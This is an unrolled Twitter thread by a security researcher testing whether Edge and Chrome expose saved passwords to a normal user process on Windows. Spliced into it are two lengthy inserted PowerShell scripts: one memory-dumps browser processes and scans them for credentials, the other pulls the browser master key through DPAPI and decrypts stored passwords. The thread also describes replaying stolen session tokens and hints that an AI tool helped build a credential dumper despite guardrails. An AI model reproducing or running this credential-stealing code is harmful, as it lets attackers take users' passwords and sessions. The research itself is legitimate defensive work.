mRr3b00t (@UK_Daniel_Card)
May 6 · 24 tweets · 8 min read
there seems to be some fun debate about Edge and its storing all the passwords in RAM in clear text, vs Chrome which stores the passwords upon use (e.g. one at a time) in RAM....

but Chrome also stores the passwords in an SQLite file and the keys are protected by DPAPI!

Guess what a userland process can do?

It can get the keys! It can decrypt! Now you might be thinking... that's not true.... so let's see: to D LAB!
ok let's make sure I have a user! this is a good starting point :D
ok tony is logged in! let's go!
ok gang we have some creds in EDGE and CHROME!
now this is funny :D
HACKED! I have stolen Iron Man's password!

(from MSEDGE via memory dump from userland)

but what about Chrome?
HACKED!!!! we haz hacked IRON MAN's CHROME as well!
and that was from userland on a NORMAL domain user account. no special privs. a fairly out-of-the-box Windows 11 machine in a fairly out-of-the-box Active Directory domain.
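Added example, written for this page to reproduce the memory-scraping step above on your own lab box; it is not the script in the thread's screenshots. From a plain user session it writes a full-memory minidump of every process with a given image name through dbghelp!MiniDumpWriteDump, then searches each dump for a marker you already know (the test user's name, say) in both UTF-8 and UTF-16LE and shows the bytes that follow each hit. PowerShell 7 on Windows is assumed; process name, output directory and marker are parameters you supply.

```powershell
# Added example (not the thread author's tooling). PowerShell 7 on Windows.
$sig = @'
[DllImport("dbghelp.dll", SetLastError = true)]
public static extern bool MiniDumpWriteDump(IntPtr hProcess, uint processId,
    Microsoft.Win32.SafeHandles.SafeFileHandle hFile, int dumpType,
    IntPtr exceptionParam, IntPtr userStreamParam, IntPtr callbackParam);
'@
Add-Type -MemberDefinition $sig -Name Native -Namespace DumpDemo

function Write-ProcessDump {
    param([Parameter(Mandatory)][string]$ProcessName,
          [Parameter(Mandatory)][string]$OutDir)
    $dumps = @()
    # Browsers are multi-process: dump every process carrying that image name.
    foreach ($p in Get-Process -Name $ProcessName -ErrorAction Stop) {
        $path = Join-Path $OutDir ('{0}_{1}.dmp' -f $ProcessName, $p.Id)
        $fs = [IO.File]::Open($path, 'Create', 'ReadWrite')
        try {
            # 0x2 = MiniDumpWithFullMemory: include every committed page, not just stacks.
            # $p.Handle is opened as the current user; no elevation is requested.
            $ok = [DumpDemo.Native]::MiniDumpWriteDump($p.Handle, [uint32]$p.Id,
                $fs.SafeFileHandle, 0x2, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)
            if (-not $ok) {
                $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
                throw "MiniDumpWriteDump failed for PID $($p.Id), Win32 error $err"
            }
        } finally { $fs.Dispose() }
        $dumps += $path
    }
    $dumps
}

function Find-MarkerInDump {
    param([Parameter(Mandatory)][string]$DumpPath,
          [Parameter(Mandatory)][string]$Marker,
          [int]$Context = 64)
    # ISO-8859-1 maps every byte to exactly one char, so the dump can be loaded
    # as a string and searched with the native (fast) String.IndexOf.
    $latin1 = [Text.Encoding]::GetEncoding(28591)
    $hay = [IO.File]::ReadAllText($DumpPath, $latin1)
    $hits = @()
    # Browser UI strings are usually UTF-16LE, form/network buffers UTF-8: check both.
    foreach ($enc in @([Text.Encoding]::UTF8, [Text.Encoding]::Unicode)) {
        $needle = $latin1.GetString($enc.GetBytes($Marker))
        $i = $hay.IndexOf($needle, [StringComparison]::Ordinal)
        while ($i -ge 0) {
            $len  = [Math]::Min($needle.Length + $Context, $hay.Length - $i)
            $raw  = $latin1.GetBytes($hay.Substring($i, $len))
            $text = $enc.GetString($raw) -replace '[^\x20-\x7e]', '.'
            $hits += [pscustomobject]@{ Offset = $i; Encoding = $enc.WebName; Snippet = $text }
            $i = $hay.IndexOf($needle, $i + $needle.Length, [StringComparison]::Ordinal)
        }
    }
    $hits
}

# Usage, as the logged-in user, with a marker you planted (e.g. the test username):
# $dumps = Write-ProcessDump -ProcessName msedge -OutDir $env:TEMP
# $dumps | ForEach-Object { Find-MarkerInDump -DumpPath $_ -Marker 'tony' }
```

Run it once right after the browser starts and again after opening the password manager page to see the delta the thread talks about; a hit whose snippet carries the password next to the username is the "it's in RAM" result, and a dump that fails with an access-denied error tells you something on the box is blocking same-user process reads.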
this is hopefully useful to know about DPAPI:
and look ma, we can export passwords from EDGE
oh we can do this from chrome as well...

we do need to enter creds to do this though (edge and chrome)
so when we think about attacks we need to think about the fact there's different threat types:

the most common threat in the world is social engineering/phishing and online connected attacks (brute force, cred spray, cred stuffing etc. and more recently AITM)

Windows DPAPI by design lets a user process get key material.
there's now a native PowerShell tool (thanks Claudius!) to dump creds....

Nirsoft doesn't dump edge either....
so Edge uses App-Bound Encryption (ABE)

learn.microsoft.com/en-us/deployed…
to note chrome can/does(?) also use ABE


I'm just working through some stuff...

if the attacker has admin/system they can do all kinds of stuff to get access to data... kaspersky.com/blog/chrome-ap…
So I’ve made some tools to get passwords from edge and chrome.

In my testing, the result was that from userland I dumped all the creds from Chrome and Edge 🤣🤣🤣🤣

So you know…… security is hard
ok I dumped Chrome memory after reloading and there were no creds in RAM.

but let's use the browser.... i bet if we load the password manager ...
in Chrome in RAM we can read strings, I can read the password from here: (not a shocker)

but the full password list does not populate on process start! this behaviour is different to Edge.

but I can read the entire SQLite DB and decrypt using key material from DPAPI
now if we load: chrome://password-manager/passwords

the story changes. (need to check the delta between page load and entering the user's password)
ok so memory scraping gets messy! but it's working......
ok Chrome is installed as a per-user install, which is why I can dump all the SQLite and use DPAPI!

this is quite an important difference
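Added example, written for this page and not the thread author's tool or any browser vendor's code: a PowerShell 7 script that does, on your own lab box, the DPAPI step described above and in the "userland process can get the keys" point earlier. As the logged-in user it reads the browser's Local State file, strips the literal "DPAPI" tag from os_crypt.encrypted_key, calls CryptUnprotectData (via .NET ProtectedData) in CurrentUser scope to recover the AES-256-GCM master key, and decrypts a v10 password blob (layout: "v10" | 12-byte nonce | ciphertext | 16-byte tag). The Local State path in the usage comment and the self-check key/blob are assumptions/constructed. It also flags the app_bound_encrypted_key and v20 entries that App-Bound Encryption adds, which user-scope DPAPI alone cannot open; pulling password_value rows out of Login Data needs a SQLite driver, which the script leaves to you.

```powershell
# Added example (not the thread author's tooling). PowerShell 7 on Windows:
# ProtectedData and AesGcm both ship with it.

function Get-OsCryptKey {
    param([Parameter(Mandatory)][string]$LocalStatePath)
    $state   = Get-Content -LiteralPath $LocalStatePath -Raw | ConvertFrom-Json
    $osCrypt = $state.os_crypt
    # With App-Bound Encryption the browser also stores app_bound_encrypted_key
    # ("APPB" tag); entries it protects are tagged v20 and need the browser's
    # elevation service, not just the user's DPAPI key.
    if ($osCrypt.PSObject.Properties.Name -contains 'app_bound_encrypted_key') {
        Write-Warning 'app_bound_encrypted_key present: v20 entries will not decrypt with this key'
    }
    [byte[]]$raw = [Convert]::FromBase64String($osCrypt.encrypted_key)
    if ([Text.Encoding]::ASCII.GetString($raw, 0, 5) -ne 'DPAPI') {
        throw 'encrypted_key does not start with the DPAPI tag'
    }
    [byte[]]$blob = $raw[5..($raw.Length - 1)]
    # CurrentUser scope is CryptUnprotectData as the logged-in user. Any process
    # running in that user's session can make this call; no admin needed.
    [Security.Cryptography.ProtectedData]::Unprotect(
        $blob, $null, [Security.Cryptography.DataProtectionScope]::CurrentUser)
}

function Unprotect-LoginBlob {
    param([Parameter(Mandatory)][byte[]]$Key,
          [Parameter(Mandatory)][byte[]]$Blob)
    if ($Blob.Length -lt 32) { throw 'blob too short to hold tag, nonce, data and GCM tag' }
    $prefix = [Text.Encoding]::ASCII.GetString($Blob, 0, 3)
    if ($prefix -eq 'v20') { throw 'v20 entry: app-bound, user DPAPI alone cannot decrypt it' }
    if ($prefix -ne 'v10') { throw "unexpected prefix '$prefix'" }
    # v10 layout: 'v10' | 12-byte GCM nonce | ciphertext | 16-byte tag, no AAD.
    [byte[]]$nonce = $Blob[3..14]
    [byte[]]$tag   = $Blob[($Blob.Length - 16)..($Blob.Length - 1)]
    [byte[]]$ct    = $Blob[15..($Blob.Length - 17)]
    $pt  = [byte[]]::new($ct.Length)
    $aes = [Security.Cryptography.AesGcm]::new($Key)
    try { $aes.Decrypt($nonce, $ct, $tag, $pt) } finally { $aes.Dispose() }
    [Text.Encoding]::UTF8.GetString($pt)
}

# Constructed self-check, no browser needed: build a v10 blob under a throwaway
# key exactly as the browser lays it out, then open it with the function above.
[byte[]]$demoKey   = 1..32
[byte[]]$demoNonce = 1..12
[byte[]]$demoPt    = [Text.Encoding]::UTF8.GetBytes('ironman-demo-password')
$demoCt  = [byte[]]::new($demoPt.Length)
$demoTag = [byte[]]::new(16)
$enc = [Security.Cryptography.AesGcm]::new($demoKey)
try { $enc.Encrypt($demoNonce, $demoPt, $demoCt, $demoTag) } finally { $enc.Dispose() }
[byte[]]$demoBlob = [Text.Encoding]::ASCII.GetBytes('v10') + $demoNonce + $demoCt + $demoTag
Unprotect-LoginBlob -Key $demoKey -Blob $demoBlob

# Against a real profile, as the logged-in user (default paths assumed; Edge
# keeps its copy under $env:LOCALAPPDATA\Microsoft\Edge\User Data):
# $key = Get-OsCryptKey "$env:LOCALAPPDATA\Google\Chrome\User Data\Local State"
# then copy "...\User Data\Default\Login Data" (the live DB is locked while the
# browser runs), read password_value from the logins table with any SQLite
# driver, and pass each blob to Unprotect-LoginBlob -Key $key.
```

The warning and the v20 check are the practical test of the per-user versus machine install difference the thread lands on: when Local State carries only encrypted_key, everything in Login Data is v10 and user-scope DPAPI is all a process in the user's session needs; once app_bound_encrypted_key appears, the same process gets the warning and the v20 throw instead of plaintext.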
so what have we learned?

1) dumping process memory is fun
2) chrome has seemingly better memory management processes than edge if memory scraping is a concern (it is)
3) userland installs of chrome aren't as safe as machine installs
4) if someone is running code that isn't you, you have lots of problems, edge memory scraping might be one.... there's probably others.
5) the design change between MS loading creds in RAM and chrome not, seems odd to me.
6) LLM guardrails are more like the pirate code

hope people enjoyed this thread, as with all things 'it depends'

also i have awesome friends at Microsoft, people should remember that people work in companies. 🫡🤗🫶

credentials / key management is hard!
also for sake of SCIENCE: in chrome I've used a passkey to authenticate to a service and then I've copied the tokens from RAM for the sessions and then re-played them!

and yes the script is called COOKIEMONSTER :P
this would work with passwords, but I'd have the potential advantage of being able to re-authenticate using the username/password.

the sessions are time limited so from theft to re-use there is a time window.

clearly there's lots of complexity in the world of authentication and key management as well as defending against unauthorized or malicious code execution.
